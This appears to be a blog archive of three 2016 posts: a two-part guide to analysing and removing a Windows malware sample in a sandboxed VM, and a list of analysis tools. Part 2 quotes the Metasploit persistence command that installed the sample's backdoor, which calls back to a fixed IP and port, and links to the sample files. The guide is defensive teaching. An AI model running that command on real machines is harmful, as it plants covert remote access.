Thursday, 28 January 2016

Just another Malware Analysis Guide (2) - Bigger Picture

Part 1 only covered a simple check and removal of the malware. Part 2 performs further analysis on the same sample. Those interested in malware analysis can refer to Practical Malware Analysis and Malware Analyst's Cookbook.

Tools that will be used on this part 2:
VMware Player/ VMware Workstation
Oracle VirtualBox
Windows 7 32/64 bits ISO
Buster Sandbox Analyzer 1.88
Sandboxie 3.70

The sandbox testing below was run on Sandboxie 3.70 with Buster Sandbox Analyzer 1.88.

===Environment Setup===
The environment setup below uses VMware Workstation and Windows 7 Ultimate 64-bit SP1.
Create a new virtual machine

Select your Windows 7 iso

Configure your machine performance

After that, click Finish. The machine powers on automatically if "Power on this virtual machine after creation" is enabled.

After Windows finishes installing, VMware Tools is installed automatically and the machine restarts.

# Install Wireshark
Just click Next until the installation finishes.

# Extract Buster Sandbox Analyzer (BSA)


# Install and configure Sandboxie

Configure Sandboxie.

Add the following to your configuration file and save.
InjectDll=C:\Users\exploit\Downloads\bsa\LOG_API\LOG_API32.dll
InjectDll64=C:\Users\exploit\Downloads\bsa\LOG_API\LOG_API64.dll
OpenWinClass=TFormBSA
NotifyDirectDiskAccess=y
* Note: Adjust the two InjectDll paths to wherever you extracted Buster Sandbox Analyzer.

On your BSA, select your Sandbox location:

# Extract the Sysinternals Suite into a folder
Add that folder to the system Path so the tools can be run from any command prompt: Start > Right Click Computer > Properties > Advanced system settings > Advanced tab > Environment Variables > Path > append the Sysinternals Suite folder path > OK > OK > OK


Open CMD and run tcpview, autoruns, procexp and procmon once each. Each prompts a license agreement box; just click Accept:

Go to your Sysinternals Suite folder, locate procexp, then Right Click > Properties > Compatibility tab > enable "Run this program as an administrator":

Right click a column header > Select Columns > enable DEP, ASLR, Verified Signer, Network Sends and Network Receives.
The Network Sends and Receives columns are only populated when Process Explorer runs as Administrator.

You can now see which processes are using the network.

# Install CFF Explorer

The screenshot above shows the libraries imported by calc.exe.

# Extract and run PeStudio

Let's take a snapshot of the virtual machine before we proceed, so the clean state can be restored after the malware runs.
On your VMware Workstation, VM Tab > Snapshot > Take Snapshot

===Analyze the malware===
Following on from Part 1, if you have a malware sample, drag and drop (or copy and paste) it into the virtual machine. Once the malware is inside the machine, run it.

Open Process Explorer and check whether any suspicious process is using a network connection.
Double click the suspicious process to view more information about the running program.

Using the malicious file's location shown there, drag and drop the malware into PeStudio.


The wsock32.dll and ws2_32.dll libraries are used to establish network connections.

Drag and drop the malware into CFF Explorer.


Drag and drop the malware into PEiD.

PEiD shows that the program contains base64-encoded data.

Open Sandboxie and Buster Sandbox Analyzer, then click Start Analysis in BSA.
It may prompt with "Delete Sandbox Folder contents and continue" and "Ignore Sandbox Folder contents and continue"; select Ignore Sandbox Folder contents and continue.
After you click Start Analysis, BSA waits for a file to be executed inside Sandboxie.

Let's drop the malicious file into Sandboxie and choose DefaultBox.

The result analysis from BSA:

You will notice a connection to IP address 192.168.0.128 on port 4433.
wsock32.dll, ws2_32.dll and wshtcpip.dll were used to make the network connection.

Notice that the malicious file is located in the Temp folder. Wondering how it executes by itself? Recall from Part 1 that the wmic command lists all startup programs.

CMD :/> wmic startup list full > startup.txt


A suspicious Visual Basic script (.vbs) is registered at startup.

Open the .vbs in a text editor. The source code has been obfuscated with random characters, but that's fine: we can still get a rough idea of what the script is trying to do.
It uses WScript.Shell to execute the malicious EXE file.

Spot the wscript process in Process Explorer:

Terminate it via Right click > Kill Process Tree, or press Shift+Delete on your keyboard.

Once the process is stopped or killed, we can safely delete the registry value and the executable file. Refer to Part 1 for how to remove the registry key and value.


* Note: If you are familiar with Metasploit, you will notice that the EXE and VBS were generated by the Meterpreter command run persistence -U -i 5 -p 4433 -r 192.168.0.128
Sample file: EXE VBS
Password: infected

End of Just another Malware Analysis Guide (2) - Bigger Picture

Tuesday, 26 January 2016

Just another Malware Analysis Guide (1) - Simple and easy

A simple way to check whether your machine has been infected by malware.

===Information gathering===
1. Run the command prompt as Administrator: Start > type "cmd" > Right-click > "Run as administrator".



Change to a directory of your choice:
C:\Windows\system32> cd C:\Users\<User>\Desktop
- cd: Change directory

C:\Users\user\Desktop> mkdir suspect
- mkdir: Make directory (folder)

2. Some useful WMIC commands:
# Obtain all running processes and output to a file
C:\Users\user\Desktop\suspect> wmic process list full > process.txt

# Obtain all the registered services and output to a file
C:\Users\user\Desktop\suspect> wmic service list full > service.txt

# Obtain all startup programs and output to a file
C:\Users\user\Desktop\suspect> wmic startup list full > startup.txt

3. Collect network information:
# Obtain DNS cache and output to file
C:\Users\user\Desktop\suspect> ipconfig /displaydns > dnscache.txt

# Obtain the current live connections
C:\Users\user\Desktop\suspect> netstat -abno > netstats.txt
- a: Displays all connections and listening ports.
- b: Displays the executable involved in creating each connection or listening port.
- n: Displays addresses and port numbers in numerical form.
- o: Displays the owning process ID associated with each connection.


Sample triage script to collect the information. *Note: it must be run as Administrator.*
If you run the script, you should see three new files as shown below:



===Analyze the gathered information===
1. Look for any weird or abnormal DNS entries in your dnscache file. The image below shows an example for Chrome:
* Note: You may verify the domain/ IP address at VirusTotal

2. Check the suspected domains/IP addresses in the netstats file. Example below:

3. Take the process ID from the netstats file and find the executable file's location.


4. Go to the malicious process file's location. Calculate its hash with HashMyFiles and look the hash up on VirusTotal for validation. If the file does not contain sensitive information, you may also upload the file itself to VirusTotal or submit it to a dedicated AntiVirus vendor.
*Note: The result can come back clean simply because no AntiVirus vendor has analyzed the sample yet.*

Example of using HashMyFiles:


5. If you confirm it is malware, terminate the process and delete the file.
Terminate through Task Manager:

Terminate through Command Prompt:
C:\Users\user\Desktop> taskkill /pid <malicious process ID>
The process ID is 520.

6. Remove the malware artifacts from the registry and services:
Check the extracted startup.txt file and look for suspicious programs.
Example:


# Delete the malicious registry value under its key.
C:\Users\user\Desktop> reg delete <malicious reg key full path> /v <value name>



# Stop and delete the service.
C:\Users\user\Desktop> sc stop <malicious service name>
C:\Users\user\Desktop> sc delete <malicious service name>

7. Restart your PC and run all the collection steps again to check whether the malware has been removed.
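Steps 2 and 3 above (take the PID of a live connection from netstat and find the executable behind it) and the startup check from Part 2 (a startup entry that runs a .vbs from the Temp folder) both boil down to parsing the collected text files. The following is an added Python example, not code from the post; the sample captures are constructed with placeholder names (update.exe, rXkLmq.vbs), while the 192.168.0.128:4433 endpoint and PID 520 are the values the posts report.

```python
import re

def parse_wmic_full(text):
    """Parse `wmic ... list full` output: Key=Value lines, one blank line between records."""
    records, cur = [], {}
    for line in text.splitlines() + [""]:  # trailing sentinel flushes the last record
        if "=" in line:
            key, _, value = line.partition("=")
            cur[key.strip()] = value.strip()
        elif cur:
            records, cur = records + [cur], {}
    return records

# One `netstat -abno` row: proto, local, remote, optional state (UDP rows have none), PID.
ROW_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+)\s+(\S+)\s+(?:([A-Z_]+)\s+)?(\d+)\s*$")
TEMP_RE = re.compile(r"\\(temp|tmp)\\", re.IGNORECASE)  # path runs from a Temp folder

def suspicious_connections(netstat_txt, process_txt):
    """Part 1 steps 2-3: map each established outbound connection to its owning executable."""
    by_pid = {int(p["ProcessId"]): p for p in parse_wmic_full(process_txt) if "ProcessId" in p}
    out = []
    for m in filter(None, map(ROW_RE.match, netstat_txt.splitlines())):
        _, _, remote, state, pid = m.groups()
        if state == "ESTABLISHED" and not remote.startswith(("127.", "[::1]", "0.0.0.0")):
            path = by_pid.get(int(pid), {}).get("ExecutablePath", "<unknown>")
            out.append((int(pid), remote, path, bool(TEMP_RE.search(path))))
    return out

def suspicious_startup(startup_txt):
    """Part 2: flag startup entries that run from Temp or launch a .vbs through wscript/cscript."""
    return [(s.get("Caption"), s["Command"]) for s in parse_wmic_full(startup_txt)
            if TEMP_RE.search(s.get("Command", ""))
            or re.search(r"\b[wc]script(\.exe)?\b.*\.vbs", s.get("Command", ""), re.I)]

# Constructed sample captures (placeholder names, not the post's real output; 192.168.0.128:4433 and PID 520 are from the post).
PROCESS_TXT = r"""
Caption=update.exe
ExecutablePath=C:\Users\user\AppData\Local\Temp\update.exe
ProcessId=520
"""
NETSTAT_TXT = r"""
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       700
  TCP    192.168.0.130:49170    192.168.0.128:4433     ESTABLISHED     520
"""
STARTUP_TXT = r"""
Caption=rXkLmq
Command=wscript.exe "C:\Users\user\AppData\Local\Temp\rXkLmq.vbs"
Location=HKU\<SID>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
"""
```

On a real machine, feed it the process.txt, netstats.txt and startup.txt collected in step 2; wmic writes UTF-16, so open those files with the matching encoding before parsing. The Location field of a flagged startup entry is the key to use with reg delete in step 6.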

End of Just another Malware Analysis Guide (1) - Simple and easy

Monday, 25 January 2016

Malware Analysis Tools

This is not a complete list, but it is enough to perform malware analysis.

Linux commands in Windows
Cygwin

File Analysis
PeExplorer
PeStudio
PEiD
CFF Explorer
OfficeMalScanner
PDF Tools
PDF Stream Dumper

Hash Calculator
HashMyFiles

Hex Editor
Hexinator
WinHex

System Analysis
Sysinternals Suite
CaptureBAT
RegShot

Network Analysis
Mandiant ApateDNS
Wireshark

Memory Forensics
DumpIt
FTK Imager Lite
Volatility
Memoryze

Disassembly and Debugger
IDA PRO
Olly Debugger
Immunity Debugger
Windows Debugger
x64 Debugger
Hopper
BinNavi
Radare2

Rebuild Import Table
Scylla

Malware Analysis Framework/ Toolkit
Viper Framework
REMnux

Sandbox
Cuckoo
Buster Sandbox Analyzer
Sandboxie

IDA Plugins
IDA Plugin Lists
IDAYara

Write your own rule
Yara

Automate validation
TargetAnalyser

Scripting
Python

More plugins and tools can be found on OpenRCE
IP/URL blacklists can be found here.
For a complete list of malware analysis tools and sources, see here!